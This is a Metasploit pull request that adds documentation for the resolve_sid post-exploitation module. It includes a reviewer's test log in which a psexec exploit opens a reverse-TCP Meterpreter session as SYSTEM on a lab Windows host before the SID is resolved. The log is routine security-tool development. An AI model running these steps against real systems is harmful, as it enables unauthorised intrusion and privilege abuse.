resolve_sid: Add docs and resolve RuboCop violations #17921

Merged: 1 commit, Apr 24, 2023

@bcoles (Contributor) commented Apr 23, 2023

msf6 > use post/windows/gather/resolve_sid
msf6 post(windows/gather/resolve_sid) > set sid S-1-5-32-544
sid => S-1-5-32-544
msf6 post(windows/gather/resolve_sid) > set session 1
session => 1
msf6 post(windows/gather/resolve_sid) > run

[*] SID Type: alias
[*] Name:     Administrators
[*] Domain:   BUILTIN
[*] Post module execution completed
msf6 post(windows/gather/resolve_sid) > 

@bcoles bcoles added the docs label Apr 23, 2023
@bwatters-r7 bwatters-r7 self-assigned this Apr 24, 2023
@bwatters-r7 (Contributor)

Testing

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'msfuser'...
[*] 10.5.134.159:445 - Selecting PowerShell target
[*] 10.5.134.159:445 - Executing the payload...
[*] Sending stage (175686 bytes) to 10.5.134.159
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.159:64613) at 2023-04-24 17:00:22 -0500

meterpreter > sysinfo
Computer        : APT_WIN2016X64
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : TESTDOMAIN
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsid
Server SID: S-1-5-18
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/psexec) > use post/windows/gather/resolve_sid
msf6 post(windows/gather/resolve_sid) > set session 1
session => 1
msf6 post(windows/gather/resolve_sid) > set sid S-1-5-18
sid => S-1-5-18
msf6 post(windows/gather/resolve_sid) > run

[*] SID Type: user
[*] Name:     SYSTEM
[*] Domain:   NT AUTHORITY
[*] Post module execution completed
msf6 post(windows/gather/resolve_sid) > 


@bwatters-r7 (Contributor)

Release Notes

This adds documentation for the module post/windows/gather/resolve_sid

@bwatters-r7 bwatters-r7 merged commit b052386 into rapid7:master Apr 24, 2023
@adfoster-r7 adfoster-r7 added the rn-enhancement release notes enhancement label Apr 24, 2023
@bcoles bcoles deleted the resolve_sid branch April 25, 2023 01:30